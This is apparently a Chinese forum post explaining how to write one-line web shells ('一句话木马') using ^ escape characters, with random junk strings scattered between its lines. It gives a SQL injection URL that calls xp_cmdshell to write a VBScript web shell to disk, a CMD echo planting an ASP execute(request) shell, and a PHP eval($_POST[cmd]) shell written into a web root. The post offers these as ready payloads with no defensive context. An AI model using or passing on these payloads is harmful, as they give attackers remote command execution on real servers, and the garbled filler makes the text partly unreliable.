用^转义字符来写ASP(一句话木马)文件的方法:+ M8 g. H0 u3 O1 o3 Z
+ i! l' x' `) J! n5 O) N, p
1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
3 H) G# L/ j9 o: c1 i0 Z* x* B
$ \ H# b* B* P8 n; \/ ~2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp; E, K" a( m8 f$ Q' w8 R7 Z
: O# Q: k& G% y( E' O( r% E8 }8 A* l0 E" f! @' y
PHP3 y, A# \3 w, @7 f$ c: u7 S+ z+ i
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对